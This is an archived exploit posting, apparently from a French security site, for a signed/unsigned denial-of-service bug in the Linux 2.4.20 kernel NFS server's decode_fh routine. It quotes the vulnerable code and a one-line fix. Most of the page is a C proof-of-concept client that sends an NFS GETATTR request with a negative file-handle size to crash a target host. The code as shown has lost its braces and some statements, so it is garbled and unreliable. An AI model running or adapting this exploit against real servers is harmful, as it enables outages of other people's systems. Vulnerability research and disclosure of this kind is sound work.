Linux 2.4.20 kernel decode_fh Denial of Service Exploit

     * Version TXT Disponible ici *
                              Linux 2.4.20 knfsd kernel signed/unsigned decode_fh DoS
                              Author: jared stanbrough  

                              Vulnerable code: (fs/nfsd/nfs3xdr.c line 52-64)

                              static inline u32 *
                              decode_fh(u32 *p, struct svc_fh *fhp)
                              int size;
                              fh_init(fhp, NFS3_FHSIZE);
                              size = ntohl(*p++);
                              if (size > NFS3_FHSIZE)
                              return NULL;   

                              memcpy(&fhp->fh_handle.fh_base, p, size);
                              fhp->fh_handle.fh_size = size;
                              return p + XDR_QUADLEN(size);

                              This code is called by quite a few XDR decoding routines. The below
                              POC demonstrates the vulnerability by encoding a malicious fhsize
                              at the beginning of a diroparg xdr argument. 

                              To test this, the vulnerable host must have an accessible exported
                              directory which was previously mounted by the attacker. _HOWEVER_ 
                              it may be possible to trigger this bug by some other method.

                              Fix: Simply change size to an unsigned int, or check for size < 0.


                              #define NFSPROG 100003
                              #define NFSVERS 3
                              #define NFSPROC_GETATTR 1

                              static struct diropargs heh;

                              bool_t xdr_heh(XDR *xdrs, diropargs *heh) 
                              int32_t werd = -1; 
                              return xdr_int32_t(xdrs, &werd);

                              int main(void)
                              CLIENT * client;
                              struct timeval tv;

                              client = clnt_create("marduk", NFSPROG, NFSVERS, "udp");

                              if(client == NULL) {

                              tv.tv_sec = 3;
                              tv.tv_usec = 0;
                              client->cl_auth = authunix_create_default();

                              clnt_call(client, NFSPROC_GETATTR, (xdrproc_t) xdr_heh, (char *)&heh,
                              (xdrproc_t) xdr_void, NULL, tv);

                              return 0;



 Audits de Sécurité & Tests Intrusifs Mailing Listes Advisories  Service Publicitaire

Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

actualité informatique  Exploits